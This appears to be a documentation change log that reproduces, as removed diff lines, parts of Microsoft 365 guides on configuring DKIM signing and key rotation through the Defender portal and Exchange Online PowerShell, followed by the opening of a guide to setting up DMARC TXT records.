- If you have already published the CNAME records, sync will take a few minutes to as
- many as 4 days based on your specific DNS. Return and retry this step later.
- ```
-
- Therefore, the CNAME records that you need to create in DNS for the contoso.com domain are:
-
- **Hostname**: `selector1._domainkey`<br>
- **Points to address or value**: `selector1-contoso-com._domainkey.contoso.onmicrosoft.com`
-
- **Hostname**: `selector2._domainkey`<br>
- **Points to address or value**: `selector2-contoso-com._domainkey.contoso.onmicrosoft.com`
-
- Copy the information from the error dialog (select the text and press CTRL+C), and then select **OK**.
-
- Leave the domain details flyout open.
-
-6. In another browser tab or window, go to the domain registrar for the domain, and then create the two CNAME records using the information from the previous step.
-
- We provide instructions to create CNAME records for different Microsoft 365 services at many domain registrars. You can use these instructions as a starting point to create the DKIM CNAME records. For more information, see [Add DNS records to connect your domain](../../admin/get-help-with-domains/create-dns-records-at-any-dns-hosting-provider.md).
-
- It takes a few minutes (or possibly longer) for Microsoft 365 to detect the new CNAME records that you created.
-
-7. After a while, return to the domain properties flout that you left open in Step 5, and select the **Sign messages for this domain with DKIM signatures** toggle.
-
- After a few seconds, the following dialog opens:
-
- :::image type="content" source="../../media/email-auth-dkim-domain-properties-cname-detected.png" alt-text="The dialog that opens when you try to enable DKIM signing for the domain." lightbox="../../media/email-auth-dkim-domain-properties-cname-detected.png":::
-
- After you select **OK** to close the dialog, verify the following settings on the details flyout:
-
- - The **Sign messages for this domain with DKIM signatures** toggle is set to **Enabled** :::image type="icon" source="../../media/scc-toggle-on.png" border="false":::.
- - The **Status** value is **Signing DKIM signatures for this domain**.
- - **Rotate DKIM keys** is available.
- - **Last checked date**: The date and time should be more recent than the original value in Step 4.
-
- :::image type="content" source="../../media/email-auth-dkim-domain-properties-rotate-keys.png" alt-text="The domain details flyout after DKIM is enabled for the domain." lightbox="../../media/email-auth-dkim-domain-properties-create-dkim.png":::
-
-### Use the Defender portal to customize DKIM signing of outbound messages using the \*.onmicrosoft.com domain
-
-As described earlier in this article, the initial \*.onmicrosoft.com domain is automatically configured to sign all outbound mail from your Microsoft 365 organization, and you should [configure custom domains to DKIM signing of outbound messages](#use-the-defender-portal-to-enable-dkim-signing-of-outbound-messages-using-a-custom-domain).
-
-But, you can also use the procedures in this section to affect DKIM signing using the \*.onmicrosoft.com domain:
--- Generate new keys. The new keys are automatically added and used in the Microsoft 365 datacenters.-- Have the properties of the \*.onmicrosoft.com domain appear correctly in the details flyout of the domain on the **DKIM** tab of the **Email authentication settings** page at <https://security.microsoft.com/authentication?viewid=DKIM> or in PowerShell. This result allows for future operations on the DKIM configuration for the domain (for example, [manual key rotation](#rotate-dkim-keys)).-
-To use the procedures in this section, the \*.onmicrosoft.com domain must appear on the **DKIM** tab of the **Email authentication settings** page at <https://security.microsoft.com/authentication?viewid=DKIM>. The properties of the \*.onmicrosoft.com domain in the details flyout must contain the following values:
---- The **Sign messages for this domain with DKIM signatures** toggle isn't available.-- The **Status** value is **No DKIM keys saved for this domain**.-- **Create DKIM keys** is present.-
-Proceed if the domain satisfies these requirements.
-
-1. In the Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Policies & rules** \> **Threat policies** \> **Email authentication settings** page. Or, to go directly to the **Email authentication settings** page, use <https://security.microsoft.com/authentication>.
-
-2. On the **Email authentication settings** page, select the **DKIM** tab.
-
-3. On the **DKIM** tab, select the \*.onmicrosoft.com domain to configure by clicking anywhere in the row other than the check box next to the name.
-
- :::image type="content" source="../../media/email-auth-dkim-domain-list.png" alt-text="The DKIM tab of the Email authentication page in the Defender portal." lightbox="../../media/email-auth-dkim-domain-list.png":::
-
-4. In the domain details flyout that opens, select **Create DKIM keys**.
-
- :::image type="content" source="../../media/email-auth-dkim-domain-properties-create-dkim.png" alt-text="The domain details flyout with the Create DKIM keys button." lightbox="../../media/email-auth-dkim-domain-properties-create-dkim.png":::
-
-5. When DKIM key creation is finished, the **Publish CNAMEs dialog** opens. Select **Close**.
-
- You can't create the CNAME records for the \*.onmicrosoft.com domain, so you don't need to copy the values. Microsoft takes care of the required DNS configuration for you.
-
-6. After you select **Close**, you're back on the domain details flyout where the **Sign messages for this domain with DKIM signatures** toggle is **Disabled** :::image type="icon" source="../../media/scc-toggle-off.png" border="false":::.
-
- :::image type="content" source="../../media/email-auth-dkim-domain-properties-create-dkim-unavailable.png" alt-text="The domain details tab with DKIM signing disabled." lightbox="../../media/email-auth-dkim-domain-properties-create-dkim-unavailable.png":::
-
- Slide the **Sign messages for this domain with DKIM signatures** toggle to **Enabled** :::image type="icon" source="../../media/scc-toggle-on.png" border="false":::, and then select **OK** in the confirmation dialog that opens.
-
- :::image type="content" source="../../media/email-auth-dkim-domain-properties-rotate-keys.png" alt-text="The domain details tab with DKIM signing enabled and DKIM signatures configured for the domain." lightbox="../../media/email-auth-dkim-domain-properties-rotate-keys.png":::
-
- When you're finished in the domain details flyout, select **Close**.
-
-### Use Exchange Online PowerShell to configure DKIM signing of outbound messages
-
-If you'd rather use PowerShell to enable DKIM signing of outbound messages using a custom domain, or to customize DKIM signing for the \*.onmicrosoft.com domain, connect to [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell) to run the following commands.
-
-> [!TIP]
-> Before you can configure DKIM signing using the custom domain, you need to add the domain to Microsoft 365. For instructions, see [Add a domain](/microsoft-365/admin/setup/add-domain#add-a-domain). To confirm that the custom domain is available for DKIM configuration, run the following command: `Get-AcceptedDomain`.
->
-> As described earlier in this article, your \*.onmicrosoft.com domain is already signing outbound email by default. Typically, unless you've manually configured DKIM signing for the \*.onmicrosoft.com domain in the Defender portal or in PowerShell, the \*.onmicrosoft.com doesn't appear in the output of **Get-DkimSigningConfig**.
-
-1. Run the following command to verify the availability and DKIM status of all domains in the organization:
-
- ```powershell
- Get-DkimSigningConfig | Format-List Name,Enabled,Status,Selector1CNAME,Selector2CNAME
- ```
-
-2. For the domain that you want to configure DKIM signing for, the output of the command in Step 1 determines what you need to do next:
-
- - The domain is listed with the following values:
- - **Enabled**: False
- - **Status**: `CnameMissing`
-
- Go to Step 3 to copy the selector values.
-
- Or
-
- - The domain isn't listed:
-
- 1. Replace \<Domain\> with the domain value, and then run the following command:
-
- ```powershell
- New-DkimSigningConfig -DomainName <Domain> -Enabled $false [-BodyCanonicalization <Relaxed | Simple>] [-HeaderCanonicalization <Relaxed | Simple>] [-KeySize <1024 | 2048>]
- ```
-
- - The _BodyCanonicalization_ parameter specifies the sensitivity level to changes in the message body:
- - Relaxed: Changes in whitespace and changes in empty lines at the end of the message body are tolerated. This is the default value.
- - Simple: Only changes in empty lines at the end of the message body are tolerated.
- - The _HeaderCanonicalization_ parameter specifies the sensitivity level to changes in the message header:
- - Relaxed: Common modifications to the message header are tolerated. For example, header field line rewrapping, changes in unnecessary whitespace or empty lines, and changes in case for header fields. This is the default value.
- - Simple: No changes to the header fields are tolerated.
- - The _KeySize_ parameter specifies the bit size of the public key in the DKIM record:
- - 1024. This is the default value.
- - 2048.
-
- For example:
-
- ```powershell
- New-DkimSigningConfig -DomainName contoso.com -Enabled $false
- ```
-
- 2. Run the command from Step 1 again to confirm that the domain is listed with the following property values:
- - **Enabled**: False
- - **Status**: `CnameMissing`
-
- 3. Go to Step 3 to copy the selector values.
-
-3. Copy the **Selector1CNAME** and **Selector2CNAME** values for the domain from the output of the command from Step 1.
-
- The CNAME records that you need to create at the domain registrar for the domain look like this:
-
- **Hostname**: `selector1._domainkey`<br>
- **Points to address or value**: `<Selector1CNAME value>`
-
- **Hostname**: `selector2._domainkey`<br>
- **Points to address or value**: `<Selector2CNAME value>`
-
- For example:
-
- **Hostname**: `selector1._domainkey`<br>
- **Points to address or value**: `selector1-contoso-com._domainkey.contoso.onmicrosoft.com`
-
- **Hostname**: `selector2._domainkey`<br>
- **Points to address or value**: `selector2-contoso-com._domainkey.contoso.onmicrosoft.com`
-
-4. Do one of the following steps:
-
- - **Custom domain**: At the domain registrar for the domain, create the two CNAME records using the information from the previous step.
-
- We provide instructions to create CNAME records for different Microsoft 365 services at many domain registrars. You can use these instructions as a starting point to create the DKIM CNAME records. For more information, see [Add DNS records to connect your domain](../../admin/get-help-with-domains/create-dns-records-at-any-dns-hosting-provider.md).
-
- It takes a few minutes (or possibly longer) for Microsoft 365 to detect the new CNAME records that you created.
-
- - **\*.onmicrosoft.com domain**: Go to Step 5.
-
-5. After a while, return to Exchange Online PowerShell, replace \<Domain\> with the domain that you configured, and run the following command:
-
- ```powerShell
- Set-DkimConfig -Identity \<Domain\> -Enabled $true [-BodyCanonicalization <Relaxed | Simple>] [-HeaderCanonicalization <Relaxed | Simple>]
- ```
-
- - The _BodyCanonicalization_ parameter specifies the sensitivity level to changes in the message body:
- - Relaxed: Changes in whitespace and changes in empty lines at the end of the message body are tolerated. This is the default value.
- - Simple: Only changes in empty lines at the end of the message body are tolerated.
- - The _HeaderCanonicalization_ parameter specifies the sensitivity level to changes in the message header:
- - Relaxed: Common modifications to the message header are tolerated. For example, header field line rewrapping, changes in unnecessary whitespace or empty lines, and changes in case for header fields. This is the default value.
- - Simple: No changes to the header fields are tolerated.
-
- For example:
-
- ```powerShell
- Set-DkimConfig -Identity contoso.com -Enabled $true
- ```
-
- Or
-
- ```powerShell
- Set-DkimConfig -Identity contoso.onmicrosoft.com -Enabled $true
- ```
-
- - For a custom domain, if Microsoft 365 is able to detect the CNAME records at the domain registrar, the command runs without error, and the domain is now used to DKIM sign outbound messages from the domain.
-
- If the CNAME records aren't detected, you get an error that contains the values to use in the CNAME records. Check for typos in the values at the domain registrar (easy to do with the dashes, periods, and underlines!), wait a while longer, and then run the command again.
-
- - For a \*.onmicrosoft.com domain that previously wasn't listed, the command runs without error.
-
-6. To verify that the domain is now configured to DKIM sign messages, run the command from Step 1.
-
- The domain should have the following property values:
-
- - **Enabled**: True
- - **Status**: `Valid`
-
-For detailed syntax and parameter information, see the following articles:
--- [Get-DkimSigningConfig](/powershell/module/exchange/get-dkimsigningconfig)-- [New-DkimSigningConfig](/powershell/module/exchange/new-dkimsigningconfig)-- [Set-DkimSigningConfig](/powershell/module/exchange/set-dkimsigningconfig)-
-## Rotate DKIM keys
-
-For the same reasons that you should periodically change passwords, you should periodically change the DKIM key that's used for DKIM signing. Replacing the DKIM key for a domain is known as _DKIM key rotation_.
-
-The relevant information about DKIM key rotation for a domain Microsoft 365 is shown in the output of the following command in [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell):
-
-```powershell
-Get-DkimSigningConfig -Identity <CustomDomain> | Format-List
-```
--- **KeyCreationTime**: The UTC date/time that the DKIM public-private key pair was created.-- **RotateOnDate**: The date/time of the previous or next DKIM key rotation.-- **SelectorBeforeRotateOnDate**: Remember, DKIM signing using a custom domain in Microsoft 365 requires two CNAME records in the domain. This property shows the CNAME record that DKIM uses before the **RotateOnDate** date-time (also known as a _selector_). The value is `selector1` or `selector2` and is different than the **SelectorAfterRotateOnDate** value.-- **SelectorAfterRotateOnDate**: Shows the CNAME record that DKIM uses after the **RotateOnDate** date-time. The value is `selector1` or `selector2` and is different than the **SelectorBeforeRotateOnDate** value.-
-When you do a DKIM key rotation on a domain as described in this section, the change isn't immediate. It takes four days (96 hours) for the new private key to start signing messages (the **RotateOnDate** date/time and the corresponding **SelectorAfterRotateOnDate** value). Until then, the existing private key is used (the corresponding **SelectorBeforeRotateOnDate** value).
-
-> [!TIP]
-> The main factor that determines when a custom domain starts DKIM signing outbound mail is the CNAME record detection in DNS.
-
-To confirm the corresponding public key that's used to verify the DKIM signature (which infers the private key that was used to sign the message), check the **s=** value in the **DKIM-Signature** header field (the selector; for example, `s=selector1-contoso-com`).
-
-> [!TIP]
-> For custom domains, you can rotate DKIM keys only on domains that are enabled for DKIM signing (the **Status** value is Enabled).
->
-> Currently, there's no automatic DKIM key rotation for the \*.onmicrosoft.com domain. You can manually rotate the DKIM keys as described in this section. If **Rotate DKIM keys** isn't available in the properties of the \*.onmicrosoft.com domain, use the procedures in the [Use the Defender portal to customize DKIM signing of outbound messages using the \*.onmicrosoft.com domain](#use-the-defender-portal-to-customize-dkim-signing-of-outbound-messages-using-the-onmicrosoftcom-domain) section earlier in this article.
-
-### Use the Defender portal to rotate DKIM keys for a custom domain
-
-1. In the Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Policies & rules** \> **Threat policies** \> **Email authentication settings** page. Or, to go directly to the **Email authentication settings** page, use <https://security.microsoft.com/authentication>.
-
-2. On the **Email authentication settings** page, select the **DKIM** tab.
-
-3. On the **DKIM** tab, select the domain to configure by clicking anywhere in the row other than the check box next to the name.
-
- :::image type="content" source="../../media/email-auth-dkim-domain-list.png" alt-text="The DKIM tab of the Email authentication page in the Defender portal." lightbox="../../media/email-auth-dkim-domain-list.png":::
-
-4. In the domain details flyout that opens, select **Rotate DKIM keys**.
-
- :::image type="content" source="../../media/email-auth-dkim-domain-properties-rotate-keys.png" alt-text="The domain details flyout with the Rotate DKIM keys button." lightbox="../../media/email-auth-dkim-domain-properties-rotate-keys.png":::
-
-5. The settings in the details flyout change to the following values:
- - **Status**: Rotating keys for this domain and signing DKIM signatures.
- - **Rotate DKIM keys** is grayed out.
-
-6. After four days (96 hours), the new DKIM key begins to sign outbound messages for the custom domain. Until then, the current DKIM key is used.
-
- You can tell when the new DKIM key is being used when the **Status** value changes from **Rotating keys for this domain and signing DKIM signatures** to **Signing DKIM signatures for this domain**.
-
- To confirm the corresponding public key that's used to verify the DKIM signature (which infers the private key that was used to sign the message), check the **s=** value in the **DKIM-Signature** header field (the selector; for example, `s=selector1-contoso-com`).
-
-#### Use Exchange Online PowerShell to rotate the DKIM keys for a domain and change the bit depth
-
-If you'd rather use PowerShell to rotate DKIM keys for a domain, connect to [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell) to run the following commands.
-
-1. Run the following command to verify the availability and DKIM status of all domains in the organization:
-
- ```powershell
- Get-DkimSigningConfig | Format-List Name,Enabled,Status,Selector1CNAME,Selector1KeySize,Selector2CNAME,Selector2KeySize,KeyCreationTime,RotateOnDate,SelectorBeforeRotateOnDate,SelectorAfterRotateOnDate
- ```
-
-2. For the domain that you want to rotate DKIM keys for, use the following syntax:
-
- ```powershell
- Rotate-DkimSigningConfig -Identity <CustomDomain> [-KeySize <1024 | 2048>]
- ```
-
- If you don't want to change the bit depth of the new DKIM keys, don't use the _KeySize_ parameter.
-
- This example rotates DKIM keys for the contoso.com domain and changes to a 2048-bit key.
-
- ```powershell
- Rotate-DkimSigningConfig -Identity contoso.com -KeySize 2048
- ```
-
- This example rotates DKIM keys for the contoso.com domain without changing the key bit depth.
-
- ```powershell
- Rotate-DkimSigningConfig -Identity contoso.com
- ```
-
-3. Run the command from Step 1 again to confirm the following property values:
-
- - **KeyCreationTime**
- - **RotateOnDate**
- - **SelectorBeforeRotateOnDate**
- - **SelectorAfterRotateOnDate**:
-
- Destination email systems use the public key in the CNAME record that's identified by the **SelectorBeforeRotateOnDate** property to verify the DKIM signature in messages (which infers the private key that was used to DKIM sign the message).
-
- After the **RotateOnDate** date/time, DKIM uses the new private key to sign messages, and destination email systems use the corresponding public key in the CNAME record that's identified by the **SelectorAfterRotateOnDate** property to verify the DKIM signature in messages.
-
- To confirm the corresponding public key that's used to verify the DKIM signature (which infers the private key that was used to sign the message), check the **s=** value in the **DKIM-Signature** header field (the selector; for example, `s=selector1-contoso-com`).
-
-For detailed syntax and parameter information, see the following articles:
--- [Get-DkimSigningConfig](/powershell/module/exchange/get-dkimsigningconfig)-- [Rotate-DkimSigningConfig](/powershell/module/exchange/rotate-dkimsigningconfig)-
-## Disable DKIM signing of outbound messages using a custom domain
-
-As described earlier in this article, enabling DKIM signing of outbound messages using a custom domain effectively switches DKIM signing from using the \*.onmicrosoft.com domain to using the custom domain.
-
-When you disable DKIM signing using a custom domain, you aren't completely disabling DKIM signing for outbound mail. DKIM signing eventually switches back to using the \*.onmicrosoft domain.
-
-### Use the Defender portal to disable DKIM signing of outbound messages using a custom domain
-
-1. In the Defender portal at <https://security.microsoft.com>, go to **Email & collaboration** \> **Policies & rules** \> **Threat policies** \> **Email authentication settings** page. Or, to go directly to the **Email authentication settings** page, use <https://security.microsoft.com/authentication>.
-
-2. On the **Email authentication settings** page, select the **DKIM** tab.
-
-3. On the **DKIM** tab, select the domain to configure by clicking anywhere in the row other than the check box next to the name.
-
-4. In the domain details flyout that opens, slide the **Sign messages for this domain with DKIM signatures** toggle to **Disabled** :::image type="icon" source="../../media/scc-toggle-off.png" border="false":::.
-
- :::image type="content" source="../../media/email-auth-dkim-domain-properties-rotate-keys.png" alt-text="The domain details flyout with the Rotate DKIM keys button." lightbox="../../media/email-auth-dkim-domain-properties-create-dkim.png":::
-
-#### Use Exchange Online PowerShell to disable DKIM signing of outbound messages using a custom domain
-
-If you'd rather use PowerShell to disable DKIM signing of outbound messages using a custom domain, connect to [Exchange Online PowerShell](/powershell/exchange/connect-to-exchange-online-powershell) to run the following commands.
-
-1. Run the following command to verify the availability and DKIM status of all domains in the organization:
-
- ```powershell
- Get-DkimSigningConfig | Format-List Name,Enabled,Status
- ```
-
- Any custom domain that you can disable DKIM signing for has the following property values:
-
- - **Enabled**: True
- - **Status**: `Valid`
-
-2. For the domain that you want to disable DKIM signing for, use the following syntax:
-
- ```powershell
- Set-DkimSigningConfig -Identity <CustomDomain> -Enabled $false
- ```
-
- This example disables DKIM signing using the custom domain contoso.com.
-
- ```powershell
- Set-DkimSigningConfig -Identity contoso.com -Enabled $false
- ```
-
-## Verify DKIM signing of outbound mail from Microsoft 365
-
-> [!TIP]
-> Before you use the methods in this section to test DKIM signing of outbound mail, wait a few minutes after any DKIM configuration changes to allow the changes to propagate.
-
-Use any of the following methods to verify DKIM signing of outbound email from Microsoft 365:
--- **Send test messages and view the related header fields from the message header in the destination email system**:-
- 1. Send a message from an account within your Microsoft 365 DKIM-enabled domain to a recipient in another email system (for example, outlook.com or gmail.com).
-
- > [!TIP]
- > Don't send mail to AOL for DKIM testing. AOL might skip the DKIM check if the SPF check passes.
-
- 2. In the destination mailbox, view the message header. For example:
- - [View internet message headers in Outlook](https://support.microsoft.com/office/cd039382-dc6e-4264-ac74-c048563d212c).
- - Use the Message Header Analyzer at <https://mha.azurewebsites.net>.
-
- 3. Find the **DKIM-Signature** header field in the message header. The header field looks like the following example:
-
- ```text
- DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=contoso.com;
- s=selector1;
- h=From:Date:Subject:Message-ID:Content-Type:MIME-Version:X-MS-Exchange-SenderADCheck;
- bh=UErATeHehIIPIXPeUAfZWiKo0w2cSsOhb9XM9ulqTX0=;
- ```
-
- - **d=**: The domain that was used to DKIM sign the message.
- - **s=**: The selector (public key in the DNS record in the domain) that was used to decrypt and verify the DKIM signature of the message.
-
- 4. Find the **Authentication-Results** header field in the message header. Although destination email systems might use slightly different formats to stamp inbound mail, the header field should include **DKIM=pass** or **DKIM=OK**. For example:
-
- ```text
- Authentication-Results: mx.google.com;
- dkim=pass header.i=@contoso.com header.s=selector1 header.b=NaHRSJOb;
- arc=pass (i=1 spf=pass spfdomain=contoso.com dkim=pass dkdomain=contoso.com dmarc=pass fromdomain=contoso.com);
- spf=pass (google.com: domain of michelle@contoso.com designates 0000:000:0000:0000::000 as permitted sender) smtp.mailfrom=michelle@contoso.com
- ```
-
- > [!TIP]
- > The DKIM signature is omitted under either of the following conditions:
- >
- > - The sender and recipient email addresses are in the same domain.
- > - The sender and recipient email addresses are in different domains that are controlled by the same organization.
- >
- > In both cases, the **DKIM-Signature** header field doesn't exist in the message header, and the **Authentication-Results** header field looks like the following example:
- >
- > ```text
- > authentication-results: dkim=none (message not signed)
- > header.d=none;dmarc=none action=none header.from=contoso.com;
- > ```
--- **Use the test in Microsoft 365 help**: This feature requires a Global Administrator account, and isn't available in Microsoft 365 Government Community Cloud (GCC), GCC High, DoD, or Office 365 operated by 21Vianet.-
- <div class="nextstepaction">
- <p><a href="https://admin.microsoft.com/AdminPortal/?searchSolutions=DKIM#/homepage" data-linktype="external">Run Tests: DKIM</a></p>
- </div>
-
- :::image type="content" source="../../media/email-auth-dkim-m365-test.png" alt-text="The DKIM diagnostics test in Microsoft 365 help." lightbox="../../media/email-auth-dkim-m365-test.png":::
-
-## DKIM signing of mail from your custom domain at other email services
-
-Some email service providers or software-as-a-service providers let you enable DKIM signing for your mail that originates from the service. But, the methods depend entirely on the email service.
-
-> [!TIP]
-> As mentioned earlier in this article, we recommend using subdomains for email systems or services that you don't directly control.
-
-For example, your email domain in Microsoft 365 is contoso.com, and you use the Adatum bulk mailing service for marketing email. If Adatum supports DKIM signing of messages from senders in your domain at their service, the messages might contain the following elements:
-
-```text
-Return-Path: <communication@adatum.com>
- From: <sender@marketing.contoso.com>
- DKIM-Signature: s=s1024; d=marketing.contoso.com
- Subject: This a message from the Adatum infrastructure, but with a DKIM signature authorized by marketing.contoso.com
-```
-
-In this example, the following steps are required:
-
-1. Adatum gives Contoso a public key to use for DKIM signing of outbound Contoso mail from their service.
-2. Contoso publishes the public DKIM key in DNS at the domain registrar for the marketing.contoso.com subdomain (a TXT record or a CNAME record).
-3. When Adatum sends mail from senders in the marketing.contoso.com domain, the messages are DKIM signed using the private key that corresponds to the public key they gave to Contoso in the first step.
-4. If the destination email system checks DKIM on inbound messages, the messages pass DKIM because they're DKIM signed.
-5. If the destination email system checks DMARC on inbound messages, the domain in the DKIM signature (the **d=** value in the **DKIM-Signature** header field) matches the domain in the From address that's shown in email clients, so the messages can also pass DMARC:
-
- **From**: sender@marketing.contoso.com<br>
- **d=**: marketing.contoso.com
-
-## Next steps
-
-As described in [How SPF, DKIM, and DMARC work together to authenticate email message senders](email-authentication-about.md#how-spf-dkim-and-dmarc-work-together-to-authenticate-email-message-senders), DKIM alone isn't enough to prevent spoofing of your Microsoft 365 domain. You also need to configure SPF and DMARC for the best possible protection. For instructions, see:
--- [Set up SPF to help prevent spoofing](email-authentication-spf-configure.md)-- [Use DMARC to validate email](email-authentication-dmarc-configure.md)-
-For mail coming _into_ Microsoft 365, you might also need to configure trusted ARC sealers if you use services that modify messages in transit before delivery to your organization. For more information, see [Configure trusted ARC sealers](email-authentication-arc-configure.md).
security Email Authentication Dmarc Configure https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/email-authentication-dmarc-configure.md
- Title: Use DMARC to validate email, setup steps
- - NOCSH
---- Previously updated : 1/29/2024
- - MET150
-
- - m365-security
- - tier1
-description: Learn how to configure Domain-based Message Authentication, Reporting, and Conformance (DMARC) to validate messages sent from your organization.
-
-appliesto:
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/eop-about" target="_blank">Exchange Online Protection</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/office-365-security/mdo-about#defender-for-office-365-plan-1-vs-plan-2-cheat-sheet" target="_blank">Microsoft Defender for Office 365 Plan 1 and Plan 2</a>
- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Set up DMARC to validate the From address domain for senders in Microsoft 365
--
-Domain-based Message Authentication, Reporting and Conformance (DMARC) is a method of [email authentication](email-authentication-about.md) that helps validate mail sent from your Microsoft 365 organization to prevent spoofed senders that are used in business email compromise (BEC), ransomware, and other phishing attacks.
-
-You enable DMARC for a domain by creating a TXT record in DNS. DMARC validation of an email message involves the following elements:
--- **Verify the domains in the MAIL FROM and FROM addresses align**: [SPF](email-authentication-spf-configure.md) and [DKIM](email-authentication-dkim-configure.md) don't require the domains in the following email addresses to "align" (match):
- - **The MAIL FROM address**: The email address that's used in the transmission of the message between SMTP email servers. This address is also known as the `5321.MailFrom` address, P1 sender, or envelope sender.
- - **The From address**: The email address in the **From** header field that's shown as the message sender in email clients. This address is also known as the `5322.From` address or P2 sender.
-
- For more information about how these email addresses can be in different domains and used for spoofing, see [Why internet email needs authentication](email-authentication-about.md#why-internet-email-needs-authentication).
-
- - DMARC uses the result from SPF to verify both of the following conditions:
- - The message came from an authorized source for the domain that's used in the MAIL FROM address (the basic requirement of SPF).
- - The domains in the MAIL FROM and From addresses in the message are aligned. This result effectively requires that valid sources for the message must be in the From address domain.
-
- - DMARC uses the result from DKIM to verify the domain that signed the message (the **d=** value in a **DKIM-Signature** header field as validated by the **s=** selector value) aligns with the domain in the From address.
-
- A message passes DMARC if one or both of the described SPF or DKIM checks pass. A message fails DMARC if both of the described SPF or DKIM checks fail.
--- **DMARC policy**: Specifies what to do with messages that fail DMARC (reject, quarantine, or no instruction).--- **DMARC reports**: Specifies where to send Aggregate reports (a periodic summary of positive and negative DMARC results) and Forensic reports (also known as _Failure reports_; nearly immediate DMARC failure results similar to a non-delivery report or bounce message).-
-Before we get started, here's what you need to know about DMARC in Microsoft 365 based on your email domain:
--- **If you use only the Microsoft Online Email Routing Address (MOERA) domain for email (for example, contoso.onmicrosoft.com)**: Although SPF and DKIM are already configured for your \*.onmicrosoft.com domain, you need to create the DMARC TXT record for the \*.onmicrosoft.com domain in the Microsoft 365 admin center. For instructions, see [this section](#use-the-microsoft-365-admin-center-to-add-dmarc-txt-records-for-onmicrosoftcom-domains-in-microsoft-365) later in this article. For more information about \*.onmicrosoft.com domains, see [Why do I have an "onmicrosoft.com" domain?](/microsoft-365/admin/setup/domains-faq#why-do-i-have-an--onmicrosoft-com--domain).--- **If you use one or more custom domains for email (for example, contoso.com)**: If you haven't already, you need to configure SPF for all custom domains and subdomains that you use for email. You also need to configure DKIM signing using the custom domain or subdomain so the domain that's used to sign the message aligns with the domain in the From address. For instructions, see the following articles:
- - [Set up SPF to help prevent spoofing](email-authentication-spf-configure.md)
- - [Use DKIM to validate outbound mail from your custom domain](email-authentication-dkim-configure.md)
-
- After that, you also need to configure the DMARC TXT records for your custom domains as described in this article. You also have the following considerations:
-
- - **Subdomains**:
- - For email services that aren't under your direct control (for example, bulk email services), we recommend using a subdomain (for example, marketing.contoso.com) instead of your main email domain (for example, contoso.com). You don't want issues with mail sent from those email services to affect the reputation of mail sent by employees in your main email domain. For more information about adding subdomains, see [Can I add custom subdomains or multiple domains to Microsoft 365?](/microsoft-365/admin/setup/domains-faq#can-i-add-custom-subdomains-or-multiple-domains-to-microsoft-365).
- - Unlike SPF and DKIM, the DMARC TXT record for a domain automatically covers all subdomains (including nonexistent subdomains) that don't have their own DMARC TXT record. In other words, you can disrupt the inheritance of DMARC on a subdomain by creating a DMARC TXT record in that subdomain. But, each subdomain requires an SPF and DKIM record for DMARC.
-
- - **If you own registered but unused domains**: If you own registered domains that aren't used for email or anything at all (also known as _parked domains_), configure the DMARC TXT records in those domains to specify that no email should ever come from those domains. **This directive includes the \*.onmicrosoft.com domain if you aren't using it for email**.
--- **DMARC checks for _inbound_ mail might need help**: If you use an email service that modifies messages in transit before delivery into Microsoft 365, you can identify the service as a trusted ARC sealer so the modified messages don't automatically fail DMARC checks. For more information, see the [Next Steps](#next-steps) section at the end of this article.-
-The rest of this article describes the DMARC TXT record that you need to create for domains in Microsoft 365, the best way to gradually and safely set up DMARC for custom domains in Microsoft 365, and how Microsoft 365 uses DMARC on _inbound_ mail.
-
-> [!TIP]
-> To create the DMARC TXT record for your **\*.onmicrosoft.com domain** in the Microsoft 365 admin center, see [this section](#use-the-microsoft-365-admin-center-to-add-dmarc-txt-records-for-onmicrosoftcom-domains-in-microsoft-365) later in this article.
->
-> There are no admin portals or PowerShell cmdlets in Microsoft 365 for you to manage DMARC TXT records in your **custom** domains. Instead, you create the DMARC TXT record at your domain registrar or DNS hosting service (often the same company).
->
-> We provide instructions to create the proof of domain ownership TXT record for Microsoft 365 at many domain registrars. You can use these instructions as a starting point to create DMARC TXT records. For more information, see [Add DNS records to connect your domain](../../admin/get-help-with-domains/create-dns-records-at-any-dns-hosting-provider.md).
->
-> If you're unfamiliar with DNS configuration, contact your domain registrar and ask for help.
-
-## Syntax for DMARC TXT records
-
-DMARC TXT records are exhaustively described in [RFC 7489](https://datatracker.ietf.org/doc/html/rfc7489).
-
-The basic syntax of the DMARC TXT record for a domain in Microsoft 365 is:
-
-**Hostname**: `_dmarc`<br/>
-**TXT value**: `v=DMARC1; <DMARC policy>; <Percentage of DMARC failed mail subject to DMARC policy>; <DMARC reports>`
-
-Or
-
-**Hostname**: `_dmarc`<br/>
-**TXT value**: `v=DMARC1; p=<reject | quarantine | none>; pct=<0-100>; rua=mailto:<DMARCAggregateReportURI>; ruf=mailto:<DMARCForensicReportURI>`
-
-For example:
-
-**Hostname**: `_dmarc`<br/>
-**TXT value**: `v=DMARC1; p=reject; pct=100; rua=mailto:rua@contoso.com; ruf=mailto:ruf@contoso.com`
--- The hostname value `_dmarc` is required.--- `v=DMARC1;` identifies the TXT record as a DMARC TXT record.--- **DMARC policy**: Tells the destination email system what to with messages that fail DMARC as described earlier in this article:
- - `p=reject`: The messages should be rejected. What actually happens to the message depends on the destination email system, but the messages are typically discarded.
- - `p=quarantine`: The messages should be accepted but marked. What actually happens to the message depends on the destination email system. For example, the message might be quarantined as spam, delivered to the Junk Email folder, or delivered to the Inbox with an identifier added to the Subject or message body.
- - `p=none`: No suggested action for messages that fail DMARC. What happens to the message depends on the email protection features in the destination email system. You use this value for [testing and tuning of the DMARC policy](#set-up-dmarc-for-active-custom-domains-in-microsoft-365) as described later in this article.
-
- > [!TIP]
- > Outbound mail from domains in Microsoft 365 that fail DMARC checks by the destination email service is routed through the [High-risk delivery pool for outbound messages](outbound-spam-high-risk-delivery-pool-about.md) if the DMARC policy for the domain is `p=reject` or `p=quarantine`. There's no override for this behavior.
